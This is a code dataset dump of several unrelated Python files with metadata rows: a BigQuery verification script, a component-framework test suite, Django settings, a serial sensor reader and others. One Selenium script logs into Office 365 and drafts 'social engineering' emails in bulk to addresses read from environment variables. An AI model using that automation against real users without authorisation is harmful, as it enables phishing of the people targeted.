return StagingAreaVerificationResult(has_metadata_error, has_file_error)
def inspect_entities_at_path(storage_client: Client, bq_client: bigquery.Client, bq_project: str,
bq_dataset: str, staging_area: str, prefix: str, entity_type: str,
release_cutoff: datetime) -> bool:
metadata_entities: dict[str, Tuple[str, str]] = {}
url = urlparse(staging_area)
if prefix:
prefix = f"{url.path.lstrip('/')}/{prefix}/{entity_type}"
else:
prefix = f"{url.path.lstrip('/')}/{entity_type}"
blobs = list(storage_client.list_blobs(url.netloc, prefix=prefix))
for blob in blobs:
content = blob.download_as_text()
file_name = blob.name.split('/')[-1]
entity_id = file_name.split('_')[0]
version = file_name.split('_')[1].replace('.json', '')
# files may be staged after we import, guard against those versions being present
version_timestamp = parse_version_to_datetime(version)
if version_timestamp > release_cutoff:
logging.info(f"Ignoring file {file_name} staged after cutoff")
continue
# multiple versions may be staged, the latest one should win
if entity_id in metadata_entities:
existing_version, _ = metadata_entities[entity_id]
if existing_version >= version:
continue
metadata_entities[entity_id] = (version, content)
if len(metadata_entities) == 0:
if entity_type == 'links':
logging.debug(f"area = {staging_area} no links data found")
return False
logging.debug(f"️area = {staging_area} No metadata for {entity_type} expected, skipping")
return False
logging.debug(f"Querying for metadata entities of type {entity_type} [area={staging_area}]")
entity_ids = metadata_entities.keys()
query = f"""
SELECT {entity_type}_id, content, version FROM `{bq_project}.datarepo_{bq_dataset}.{entity_type}`
WHERE {entity_type}_id IN UNNEST(@entity_ids)
"""
job_config = bigquery.QueryJobConfig(
query_parameters=[
bigquery.ArrayQueryParameter("entity_ids", "STRING", entity_ids),
]
)
query_job = bq_client.query(query, job_config=job_config)
rows = {row[f'{entity_type}_id']: (row['version'], row['content']) for row in query_job.result()}
has_error = False
for key, (version, content) in metadata_entities.items():
if key not in rows.keys():
logging.info(f"❌ area = {staging_area} {entity_type} ID {key} not in table")
return True
row = rows[key]
parsed_version = parser.parse(version)
if parsed_version < row[0]:
# old version staged but a newer version was present, ignore
logging.debug(
f"Newer version of entity present in repo, ignoring. [area={staging_area}, entity_type={entity_type}, id={key}]"
)
continue
if not parser.parse(version) == row[0]:
has_error = True
logging.info(f"❌ area = {staging_area} {entity_type} ID {key} version is incorrect")
if not json.loads(content) == json.loads(row[1]):
has_error = True
logging.info(f"❌ area = {staging_area} {entity_type} ID {key} content is incorrect")
logging.debug(
f"✅ area = {staging_area} - (metadata) all {entity_type} entities found ({len(metadata_entities.keys())} entities)")
return has_error
def verify_metadata(staging_area: str, bq_project: str, bq_dataset: str, release_cutoff: datetime) -> bool:
creds = get_credentials()
storage_client = storage.Client(project="broad-dsp-monster-hca-prod", credentials=creds)
client = bigquery.Client(project=bq_project)
logging.debug(f"Verifying metadata for {staging_area}")
links_errors = inspect_entities_at_path(
storage_client,
client,
bq_project,
bq_dataset,
staging_area,
"",
"links",
release_cutoff
)
non_file_metadata_errors = [
inspect_entities_at_path(
storage_client,
client,
bq_project,
bq_dataset,
staging_area,
"metadata",
non_file_metadata_type.value,
release_cutoff
) for non_file_metadata_type in
NonFileMetadataTypes]
file_metadata_errors = [
inspect_entities_at_path(
storage_client,
client, bq_project,
bq_dataset,
staging_area,
"metadata",
file_metadata_type.value,
release_cutoff
) for file_metadata_type in FileMetadataTypes]
return any(file_metadata_errors) or any(non_file_metadata_errors) or links_errors
def verify(manifest_file: str, gs_project: str, bq_project: str,
dataset: str, pool_size: int, release_cutoff: str) -> int:
staging_areas = parse_manifest_file(manifest_file)
parsed_cutoff = datetime.fromisoformat(release_cutoff)
logging.info("Parsing manifest...")
logging.info(f"Release cutoff = {release_cutoff}")
logging.info(f"{len(staging_areas)} staging areas in manifest.")
logging.info(f"Inspecting staging areas (pool_size = {pool_size})...")
# we multiprocess because this takes quite awhile for > 10 projects, which is common for our releases
frozen = partial(
process_staging_area,
gs_project=gs_project,
bq_project=bq_project,
dataset=dataset,
release_cutoff=parsed_cutoff)
if pool_size > 0:
with Pool(pool_size) as p:
results = p.map(frozen, staging_areas)
else:
results = [frozen(area) for area in staging_areas]
logging.info('-' * 80)
if any(map(lambda x: x.has_errors(), results)):
logging.error(f"❌ Manifest {manifest_file} had errors")
return 1
else:
logging.info(f"✅ Manifest {manifest_file} had no errors")
return 0
if __name__ == '__main__':
argparser = argparse.ArgumentParser()
argparser.add_argument("-f", "--manifest-file", required=True)
argparser.add_argument("-g", "--gs-project", required=True)
argparser.add_argument("-b", "--bq-project", required=True)
argparser.add_argument("-d", "--dataset", required=True)
argparser.add_argument("-p", "--pool-size", type=int, default=4)
argparser.add_argument("-r", "--release-cutoff", required=True)
args = argparser.parse_args()
exit_code = verify(
args.manifest_file,
args.gs_project,
args.bq_project,
args.dataset,
args.pool_size,
args.release_cutoff)
sys.exit(exit_code)
| 38.787037 | 133 | 0.675181 | 239 | 0.018991 | 0 | 0 | 287 | 0.022805 | 0 | 0 | 3,743 | 0.297418 |
5e2476302965d3f750b92ecaf21e5583f8afcf03 | 7,780 | py | Python | camd3/infrastructure/component/tests/test_component.py | mamrhein/CAmD3 | d20f62295771a297c3fbb314beef314e5ec7a2b5 | [
"BSD-2-Clause"
] | null | null | null | camd3/infrastructure/component/tests/test_component.py | mamrhein/CAmD3 | d20f62295771a297c3fbb314beef314e5ec7a2b5 | [
"BSD-2-Clause"
] | null | null | null | camd3/infrastructure/component/tests/test_component.py | mamrhein/CAmD3 | d20f62295771a297c3fbb314beef314e5ec7a2b5 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
# ----------------------------------------------------------------------------
# Name: test_component
# Purpose: Test driver for module component
#
# Author: Michael Amrhein (michael@adrhinum.de)
#
# Copyright: (c) 2014 Michael Amrhein
# ----------------------------------------------------------------------------
# $Source$
# $Revision$
"""Test driver for module component"""
from abc import ABC
from numbers import Number
from typing import Tuple
import unittest
from camd3.infrastructure.component import (
Attribute, Component, ComponentLookupError, Immutable, implementer)
from camd3.infrastructure.component.component import _ABCSet, ComponentMeta
DFLT_NAMESPACE = ('__module__', '__qualname__', '__doc__')
class TestComp1(Component):
"""TestComp1"""
class TestComp2(Component):
"""TestComp2"""
attr1 = Attribute()
attr2 = Attribute()
def meth(self):
pass
attr3 = Attribute()
@property
def prop(self):
pass
@implementer(TestComp1, TestComp2)
class TestImpl(Component):
def __init__(self):
pass
class TestComp1Factory:
def __call__(self, i: Number) -> TestComp1:
return TestImpl()
def Number2TestComp1(i: Number) -> TestComp1: # noqa: D103
return TestImpl()
def Str2TestComp2(s: str) -> TestComp2: # noqa: D103
return TestImpl()
@implementer(TestComp1)
class TestABC(ABC):
pass
class TestComp3(Component):
"""TestComp3"""
def __init_subclass__(subcls, **kwds): # noqa: D105
try:
param = kwds.pop('param')
except KeyError:
pass
else:
subcls.param = param
class TestImpl3(TestComp3, param='P'):
pass
class TestComp4(Component, Immutable):
"""TestComp4"""
class TestComp5(TestComp4):
"""TestComp5"""
a = Attribute()
b = Attribute()
class TestComp6(TestComp5):
"""TestComp6"""
c = Attribute()
def __init__(self, a, b, c):
self.a = a
self.b = b
self.c = c
def Obj2TestComp6(obj: object) -> TestComp6: # noqa: D103
return TestComp6(obj, None, None)
def Tuple2TestComp6(tpl: Tuple[int, int, str]) -> TestComp6: # noqa: D103
return TestComp6(*tpl)
class TestComp7(TestComp6):
"""TestComp7"""
class TestComp8(TestComp1):
"""TestComp8"""
def __init__(self, a):
self.a = a
self.i = self.initialized
class ABCSetTest(unittest.TestCase):
def testAdd(self):
cls_list = (ABC, Immutable, TestComp4, Component)
self.assertEqual(_ABCSet(cls_list), _ABCSet({ABC, TestComp4}))
cls_list = (int, object, Number, float)
self.assertEqual(_ABCSet(cls_list), _ABCSet({int, float}))
class ComponentMetaTest(unittest.TestCase):
def test_constructor(self):
# name of descriptors
for name in ('attr1', 'attr2', 'attr3'):
self.assertEqual(getattr(getattr(TestComp2, name, None),
'name', None), name)
# __slots__ forced?
self.assertEqual(getattr(TestComp4, '__slots__', None), ())
self.assertEqual(getattr(TestComp5, '__slots__', None), ('_a', '_b'))
self.assertEqual(getattr(TestComp6, '__slots__', None), ('_c',))
self.assertRaises(TypeError, ComponentMeta, 'Test',
(TestImpl, TestComp4), {})
def test_init_subclass(self):
# init_subclass turned into a class method?
meth = TestComp3.__init_subclass__
self.assertTrue(getattr(meth, '__self__', None) is TestComp3)
# __init_subclass called?
self.assertEqual(getattr(TestImpl3, 'param', None), 'P')
def test_attr_names(self):
self.assertEqual(TestComp2.attr_names, ('attr1', 'attr2', 'attr3'))
self.assertEqual(TestComp2.all_attr_names,
('attr1', 'attr2', 'attr3'))
self.assertEqual(TestImpl.attr_names, ())
self.assertEqual(TestImpl.all_attr_names, ())
self.assertEqual(TestComp6.attr_names, ('c',))
self.assertEqual(TestComp6.all_attr_names, ('a', 'b', 'c'))
def test_implementer(self):
self.assertTrue(issubclass(TestImpl, TestComp1))
self.assertTrue(issubclass(TestImpl, TestComp2))
self.assertEqual(TestImpl.__virtual_bases__, {TestComp1, TestComp2})
self.assertTrue(issubclass(TestABC, TestComp1))
def test_adaptation(self):
# wrong component
self.assertRaises(AssertionError, TestComp2.add_adapter,
TestComp1Factory())
self.assertRaises(AssertionError, TestComp2.add_adapter,
Tuple2TestComp6)
# wrong number of args
func = lambda x, y: TestComp2()
func.__annotations__ = {'return': TestComp2, 'x': int, 'y': int}
self.assertRaises(AssertionError, TestComp2.add_adapter, func)
# variable number of args
func = lambda *args: TestComp2()
func.__annotations__ = {'return': TestComp2, 'args': int}
self.assertRaises(AssertionError, TestComp2.add_adapter, func)
# register some adapters
fct = TestComp1Factory()
TestComp1.add_adapter(fct)
self.assertIn(Number, TestComp1.__adapters__)
self.assertIn(fct, TestComp1.__adapters__[Number])
TestComp1.add_adapter(Number2TestComp1)
self.assertIn(Number2TestComp1, TestComp1.__adapters__[Number])
TestComp1.add_adapter(Number2TestComp1)
self.assertEqual(len(TestComp1.__adapters__[Number]), 2)
TestComp2.add_adapter(Str2TestComp2)
self.assertIn(str, TestComp2.__adapters__)
self.assertIn(Str2TestComp2, TestComp2.__adapters__[str])
TestComp6.add_adapter(Tuple2TestComp6)
adapter = TestComp6.add_adapter(Obj2TestComp6)
self.assertEqual(adapter, Obj2TestComp6)
# retrieve adapters
self.assertEqual(TestComp1.get_adapter(5), Number2TestComp1)
self.assertEqual(TestComp1.get_adapter(5.0), Number2TestComp1)
self.assertRaises(ComponentLookupError, TestComp1.get_adapter, 'x')
self.assertEqual(TestComp2.get_adapter('abc'), Str2TestComp2)
self.assertRaises(ComponentLookupError, TestComp2.get_adapter, 3)
self.assertEqual(TestComp6.get_adapter((3, 1, 'x')), Tuple2TestComp6)
self.assertEqual(TestComp6.get_adapter([3, 1, 'x']), Obj2TestComp6)
self.assertEqual(TestComp6.get_adapter(TestComp6(3, 1, 'x')),
Obj2TestComp6)
self.assertEqual(TestComp4.get_adapter((3, 1, 'x')), Tuple2TestComp6)
self.assertEqual(TestComp4.get_adapter([3, 1, 'x']), Obj2TestComp6)
# adapt objects
self.assertIsInstance(TestComp1.adapt(5), TestComp1)
self.assertIsInstance(TestComp1[5.0], TestComp1)
self.assertIsInstance(TestComp2.adapt('x'), TestComp2)
t1 = TestComp6.adapt((5, 17, 'abc'))
self.assertIsInstance(t1, TestComp6)
self.assertEqual((t1.a, t1.b, t1.c), (5, 17, 'abc'))
t2 = TestComp6.adapt(fct)
self.assertIsInstance(t2, TestComp6)
self.assertIs(t2.a, fct)
self.assertRaises(TypeError, TestComp7.adapt, t2)
t3 = TestComp6(4, 9, 'y')
for ct in (TestComp6, TestComp5, TestComp4):
self.assertIs(ct.adapt(t3), t3)
def test_repr(self):
self.assertEqual(repr(TestComp3),
'.'.join((__name__, TestComp3.__qualname__)))
class ComponentTest(unittest.TestCase):
def test_constructor(self):
comp = TestComp8(19)
self.assertFalse(comp.i)
self.assertTrue(comp.initialized)
if __name__ == '__main__':
unittest.main()
| 31.12 | 78 | 0.626735 | 6,439 | 0.827635 | 0 | 0 | 193 | 0.024807 | 0 | 0 | 1,093 | 0.140488 |
5e24791c84d380b2bbc7c1f3fc43d01d827c03a9 | 1,112 | py | Python | docs/source/examples/data_exploration.py | SimulatedANeal/carpedm | 22bd5d28cfff50d7462e2a8e1b8dc1675e2a4c89 | [
"MIT"
] | 2 | 2020-09-30T04:59:06.000Z | 2021-03-30T20:42:44.000Z | docs/source/examples/data_exploration.py | SimulatedANeal/carpedm | 22bd5d28cfff50d7462e2a8e1b8dc1675e2a4c89 | [
"MIT"
] | null | null | null | docs/source/examples/data_exploration.py | SimulatedANeal/carpedm | 22bd5d28cfff50d7462e2a8e1b8dc1675e2a4c89 | [
"MIT"
] | 1 | 2018-05-25T07:15:16.000Z | 2018-05-25T07:15:16.000Z | #
# Copyright (C) 2018 Neal Digre.
#
# This software may be modified and distributed under the terms
# of the MIT license. See the LICENSE file for details.
"""Data exploration.
If this file is changed, please also change the ``:lines:`` option in
the following files where this code is referenced with the
``literalinclude`` directive.
* carpedm/data/meta.py
* ../guides/usage.rst
"""
import carpedm as dm
# Create objects for storing meta data
single_kana = dm.data.MetaLoader(data_dir=dm.data.sample, image_scope='char', charset=dm.data.CharacterSet('kana'))
kanji_seq = dm.data.MetaLoader(data_dir=dm.data.sample, image_scope='seq', seq_len=3, charset=dm.data.CharacterSet('kanji'))
full_page = dm.data.MetaLoader(data_dir=dm.data.sample, image_scope='page', charset=dm.data.CharacterSet('all'))
# View images
single_kana.view_images(subset='train', shape=(64,64))
kanji_seq.view_images(subset='dev', shape=(None, 64))
full_page.view_images(subset='test', shape=None)
# Save the data as TFRecords (default format_store)
single_kana.generate_dataset(out_dir='/tmp/pmjtc_data', subset='train')
| 34.75 | 124 | 0.755396 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 570 | 0.51259 |
5e24ac8f67e463350fcf36a595dd6de2bd0934f3 | 284 | py | Python | backend/czi_hosted/auth/__init__.py | danmedani/cellxgene | 26de334274dad9fdf5d162bdff810055cf176633 | [
"MIT"
] | 1 | 2021-05-13T13:27:43.000Z | 2021-05-13T13:27:43.000Z | backend/czi_hosted/auth/__init__.py | danmedani/cellxgene | 26de334274dad9fdf5d162bdff810055cf176633 | [
"MIT"
] | 7 | 2021-01-07T19:20:57.000Z | 2021-06-15T18:17:55.000Z | backend/czi_hosted/auth/__init__.py | danmedani/cellxgene | 26de334274dad9fdf5d162bdff810055cf176633 | [
"MIT"
] | 1 | 2021-11-05T02:04:22.000Z | 2021-11-05T02:04:22.000Z | # import the built in auth types so they can be registered
import backend.czi_hosted.auth.auth_test # noqa: F401
import backend.czi_hosted.auth.auth_session # noqa: F401
import backend.czi_hosted.auth.auth_oauth # noqa: F401
import backend.czi_hosted.auth.auth_none # noqa: F401
| 40.571429 | 58 | 0.795775 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 106 | 0.373239 |
5e258998c36f2750ad77c20394970f9287298117 | 1,534 | py | Python | core/net_loader.py | nikon-petr/perceptron | 40509070e1d5c2407e5778af9bccde1eda284efb | [
"MIT"
] | null | null | null | core/net_loader.py | nikon-petr/perceptron | 40509070e1d5c2407e5778af9bccde1eda284efb | [
"MIT"
] | null | null | null | core/net_loader.py | nikon-petr/perceptron | 40509070e1d5c2407e5778af9bccde1eda284efb | [
"MIT"
] | null | null | null | import os
from json import JSONDecodeError
from json import dump
from json import load
import numpy as np
from core.net_errors import JsonFileStructureIncorrect, JsonFileNotFound
def upload(net_object, path):
if not os.path.isfile(path):
raise JsonFileNotFound()
try:
with open(path, 'r') as file:
deserialized_file = load(file)
net_object.config = deserialized_file['config']
net_object.tags = deserialized_file.get('tags')
net_object.net = deserialized_file.get('net')
net_object.deviation = deserialized_file.get('normalization')
if net_object.net:
for l in range(1, len(net_object.config)):
net_object.net[l - 1]['w'] = np.array(net_object.net[l - 1]['w'])
net_object.net[l - 1]['o'] = np.zeros((net_object.config[l]))
except KeyError:
raise JsonFileStructureIncorrect()
except JSONDecodeError:
raise
def unload(net_object, path):
try:
net_copy = []
for l in range(len(net_object.net)):
net_copy.append({'w': net_object.net[l]['w'].tolist()})
with open(path, 'w') as file:
file_dictionary = {
'config': net_object.config,
'tags': net_object.tags,
'net': net_copy,
'normalization': net_object.normalization
}
dump(file_dictionary, file, sort_keys=True, indent=4)
except JSONDecodeError:
raise
| 30.68 | 85 | 0.595828 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 89 | 0.058018 |
5e25ad68634e5c0fbd0c26e49c6c7143c51f61a8 | 5,292 | py | Python | analytics/settings.py | Kratos-Freyja/analytics | 9de41b990e78e7a7ae912ebecd93fab50cb47320 | [
"MIT"
] | null | null | null | analytics/settings.py | Kratos-Freyja/analytics | 9de41b990e78e7a7ae912ebecd93fab50cb47320 | [
"MIT"
] | null | null | null | analytics/settings.py | Kratos-Freyja/analytics | 9de41b990e78e7a7ae912ebecd93fab50cb47320 | [
"MIT"
] | null | null | null | """
Django settings for analytics project.
Generated by 'django-admin startproject' using Django 1.11.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
from config import system
from config import database
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = system.APP_SECRET_KEY
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = system.DEBUG
ALLOWED_HOSTS = ['0.0.0.0', 'localhost']
# Session serializers
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'
# Application definition
INSTALLED_APPS = [
'corsheaders',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'lead',
'fund',
'partner',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'corsheaders.middleware.CorsMiddleware',
]
# App urls
ROOT_URLCONF = 'analytics.urls'
CORS_ORIGIN_ALLOW_ALL = system.CORS_ORIGIN_ALLOW
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
BASE_DIR + system.TEMPLATE_PATH, # base templates
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:6379/1",
"TIMEOUT": None,
"OPTIONS": {
"MAX_ENTRIES": 1000,
"CLIENT_CLASS": "django_redis.client.DefaultClient",
"CONNECTION_POOL_KWARGS": {"max_connections": 100}
}
}
}
WSGI_APPLICATION = 'analytics.wsgi.application'
LOGIN_URL = '/login/'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
db: {
"ENGINE": database.config[db]["ENGINE"],
"NAME": database.config[db]["DB_NAME"],
"USER": database.config[db]["USERNAME"],
"PASSWORD": database.config[db]["PASSWORD"],
"HOST": database.config[db]["HOST"],
"PORT": database.config[db]["PORT"]
}
for db in database.config
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Calcutta'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
# Directory where static files are stored
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
BASE_DIR + "/",
]
STATIC_URL = STATICFILES_DIRS[1]
FILES_DIR = os.path.join(BASE_DIR, system.TEMP_FOLDER)
# logger settings
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"verbose": {
"format": "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
"datefmt": "%d/%b/%Y %H:%M:%S"
},
"simple": {
"format": "%(levelname)s %(message)s"
},
},
"handlers": {
"file": {
"level": "DEBUG",
"class": "logging.FileHandler",
"filename": "logs.log",
"formatter": "verbose"
},
},
"loggers": {
"django": {
"handlers": ["file"],
"propagate": True,
"level": "DEBUG",
},
"bo": {
"handlers": ["file"],
"level": "DEBUG",
},
"django.request": {
"handlers": ["file"],
"level": "DEBUG",
"propagate": False,
},
}
}
# RQ Queues
RQ_QUEUES = {
'default': {
'HOST': 'localhost',
'PORT': 6379,
'DB': 0,
'PASSWORD': 'some-password',
'DEFAULT_TIMEOUT': 360,
},
'high': {
'URL': os.getenv('REDISTOGO_URL', 'redis://localhost:6379/0'), # If you're on Heroku
'DEFAULT_TIMEOUT': 500,
},
'low': {
'HOST': 'localhost',
'PORT': 6379,
'DB': 0,
}
} | 24.164384 | 92 | 0.655518 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,396 | 0.641723 |
5e261f4a29f9c6da5e5d39b2f670faea1fe9471d | 4,396 | py | Python | production/tests/O365_SE_Email.py | GoVanguard/SeleniumBase | 29241d58ccba23bb94ebf4c4a51fad578c4aceb8 | [
"MIT"
] | null | null | null | production/tests/O365_SE_Email.py | GoVanguard/SeleniumBase | 29241d58ccba23bb94ebf4c4a51fad578c4aceb8 | [
"MIT"
] | null | null | null | production/tests/O365_SE_Email.py | GoVanguard/SeleniumBase | 29241d58ccba23bb94ebf4c4a51fad578c4aceb8 | [
"MIT"
] | null | null | null | """
The Office 365 Social Engineering Email draft producer uses a customized
library of methods in this master class to maintain continuous delivery.
This repository is controlled by a single boolean that is set to false by
default. Please ensure that the emailDraft.py file is correct.
"""
# Built-in Imports
import os
# SeleniumBase Web Application Testing Framework
from seleniumbase import BaseCase
# Selenium Exception Imports
from selenium.common.exceptions import NoSuchElementException
# Logging Import Setup
import logging
filename = '/SeleniumBase/production/tests/O365SEEmailLog/test.log'
format = '%(asctime)s %(levelname)s: %(message)s'
# Logging file setup
logging.basicConfig(filename=filename, format=format,
encoding='utf-8', level=logging.INFO)
class BaseTestCase(BaseCase):
def setUp(self):
super(BaseTestCase, self).setUp()
# <<< Run custom setUp() code for tests AFTER the super().setUp() >>>
def tearDown(self):
self.save_teardown_screenshot()
if self.has_exception():
# <<< Run custom code if the test failed. >>>
pass
else:
# <<< Run custom code if the test passed. >>>
pass
# (Wrap unreliable tearDown() code in a try/except block.)
# <<< Run custom tearDown() code BEFORE the super().tearDown() >>>
super(BaseTestCase, self).tearDown()
def clickCSSObject(self, CSSSelector):
if self.is_element_present(CSSSelector):
try:
self.click(CSSSelector)
print('CSS Object found: {0}'.format(CSSSelector))
except NoSuchElementException as exc:
print(exc)
print('CSS Object not found: {0}'.format(CSSSelector))
else:
print('CSS Object not found: {0}'.format(CSSSelector))
source = self.get_page_source()
logging.warning(source)
def createEmail(self, email):
toInput = 'input[aria-label="To"]'
ccInput = 'input[aria-label="Cc"]'
cc = os.getenv('O365_SE_TO', '')
subjectInput = 'input[aria-label="Add a subject"]'
subject = os.getenv('O365_SE_SUBJECT', '')
messageInput = 'input[aria-label="Message body"]'
message = os.getenv('O365_SE_MESSAGE', '')
moreOptions = '#compose_ellipses_menu'
importance = 'button[aria-label="Set importance"]'
highImportance = 'button[name="High"]'
clickChain1 = [moreOptions, importance, highImportance]
showMessageOptions = 'button[aria-label="Show message options..."]'
self.type(toInput, email)
self.type(ccInput, cc)
self.type(subjectInput, subject)
self.type(messageInput, message)
self.click_chain(clickChain1, spacing=0.1)
self.clickCSSObject(showMessageOptions)
def createEmails(self):
# <<< Load welcome page markdown. >>>
# Reduce duplicate code in tests by having reusable methods like this.
# If the UI changes, the fix can be applied in one place.
self.open('https://office.com/')
loginBtn = 'div[class="mectrl_header_text mectrl_truncate"]'
usernameInput = '#i0116'
username = os.getenv('O365_SE_USERNAME', 'testUser')
nextBtn = '#idSIButton9'
passwordInput = '#i0118'
password = os.getenv('O365_SE_PASSWORD', 'testPass')
doNotRetainCreds = '#idBtn_Back'
# outlook1 = 'a[aria-label="Outlook"]'
outlook = 'a[id="ShellMail_link"]'
# outlook3 = '#20AC5DE0-9796-4393-8656-9711B92C5223'
newMessage1 = '#id__6'
# newMessage2 = '#id__1718'
self.clickCSSObject(loginBtn)
self.clickCSSObject(usernameInput)
self.type(usernameInput, username)
self.clickCSSObject(nextBtn)
self.type(passwordInput, password)
self.clickCSSObject(nextBtn)
self.clickCSSObject(doNotRetainCreds)
# self.clickCSSObject(outlook1)
self.wait_for_element(outlook)
self.clickCSSObject(outlook)
# self.clickCSSObject(outlook3)
self.wait_for_element(newMessage1)
self.clickCSSObject(newMessage1)
# self.clickCSSObject(newMessage2)
stringList = os.getenv('O365_SE_EMAILS', '')
emailList = stringList.split()
for email in emailList:
self.createEmail(email)
| 39.25 | 78 | 0.64354 | 3,605 | 0.820064 | 0 | 0 | 0 | 0 | 0 | 0 | 1,830 | 0.416288 |
5e26733308ed8f42d4be84bd5ccccd072a511eca | 1,357 | py | Python | test.py | FirstDraftGIS/is-a-place-counter | 2af139da34c575101bbd4545e889298682fc3487 | [
"MIT"
] | 1 | 2019-02-15T15:17:41.000Z | 2019-02-15T15:17:41.000Z | test.py | FirstDraftGIS/is-a-place-counter | 2af139da34c575101bbd4545e889298682fc3487 | [
"MIT"
] | null | null | null | test.py | FirstDraftGIS/is-a-place-counter | 2af139da34c575101bbd4545e889298682fc3487 | [
"MIT"
] | null | null | null | from datetime import datetime
from csv import DictReader
from numpy import mean
from numpy import median
import pickle
import unittest
from config import path_to_pickled_counter
from config import path_to_tsv
class TestDataMethods(unittest.TestCase):
@classmethod
def setUpClass(cls):
with open(path_to_pickled_counter, "rb") as f:
cls.counter = pickle.load(f)
with open(path_to_tsv) as f:
cls.rows = [{"name": r["name"], "yes": int(r["yes"]), "no": int(r["no"]) } for r in list(DictReader(f, delimiter="\t"))]
def test_row_count(self):
row_count = len(self.rows)
self.assertGreaterEqual(row_count, 200000)
self.assertEqual(len(self.counter), len(self.rows))
def test_total_counts(self):
self.assertGreaterEqual(sum([r["yes"] + r["no"] for r in self.rows]), 1e6)
self.assertGreaterEqual(sum([sum(i[1].values()) for i in self.counter.items()]), 1e6)
def test_median_percentage_yes(self):
percentages = [row["yes"] / (row["yes"] + row["no"]) for row in self.rows]
self.assertEqual(median(percentages), 0)
self.assertGreaterEqual(mean(percentages), 0.05)
num_over_50 = len([p for p in percentages if p > 0.5])
self.assertGreaterEqual(num_over_50, 13000)
if __name__ == '__main__':
unittest.main()
| 35.710526 | 132 | 0.659543 | 1,097 | 0.808401 | 0 | 0 | 303 | 0.223287 | 0 | 0 | 71 | 0.052321 |
5e29ce6a0e41b1a83ed81d1c6dec37481ec7d6e5 | 2,950 | py | Python | scalpel/utils/sensor.py | straizys/elliptical-excision-force-model | c30619ea3879de38b5643c0c31946e2db57dafbc | [
"MIT"
] | null | null | null | scalpel/utils/sensor.py | straizys/elliptical-excision-force-model | c30619ea3879de38b5643c0c31946e2db57dafbc | [
"MIT"
] | null | null | null | scalpel/utils/sensor.py | straizys/elliptical-excision-force-model | c30619ea3879de38b5643c0c31946e2db57dafbc | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import sys, serial
import numpy as np
from collections import deque
import itertools
import csv
from datetime import datetime
import time
import rospy
from std_msgs.msg import Int32MultiArray
class Sensor:
def __init__(self, strPort, maxLen):
self.ser = serial.Serial(strPort, 9600)
self.ser.write(b'2') # start the data stream
line = self.ser.readline() # ignore first 100 msgs
print(line)
self.ax = deque([0.0] * maxLen) # active coil
self.ay = deque([0.0] * maxLen) # reference coil
self.az = deque([0.0] * maxLen) # differential, drift compensated
self.maxLen = maxLen
self.run = False
self.base = 0
self.trackPause = False
# print('calibration')
# self.cali = self.calibration()
def addToBuf(self, buf, val):
if len(buf) < self.maxLen:
buf.append(val)
else:
buf.pop()
buf.appendleft(val)
def add(self, data):
assert (len(data) == 2)
self.addToBuf(self.ax, int(data[0][1:], 16))
self.addToBuf(self.ay, int(data[1][1:], 16))
diff = int(data[0][1:], 16) - int(data[1][1:], 16)
data = self.track_base(diff)
self.addToBuf(self.az, data)
def track_base(self, datain):
if (datain - self.base) > 3000:
self.trackPause = True
else:
self.trackPause = False
if not self.run:
self.base = datain
self.run = True
else:
if not self.trackPause:
if datain > self.base:
self.base += 300
else:
self.base -= 300
data = datain - self.base
return data
def update(self):
line = self.ser.readline()
data = [val for val in line.split()]
self.add(data[:2])
def close(self):
# close serial
self.ser.flush()
self.ser.close()
def calibration(self):
cal_len = 100
cal_val = np.zeros([2, cal_len])
for i in range(cal_len):
line = self.ser.readline() # ignore first 100 msgs...
data = [val for val in line.split()]
cal_val[0, i] = int(data[0][1:], 16)
cal_val[1, i] = int(data[1][1:], 16)
return cal_val.mean(axis=1)
def main():
strPort = '/dev/ttyACM0'
print('reading from serial port %s...' % strPort)
sensor = Sensor(strPort, 100)
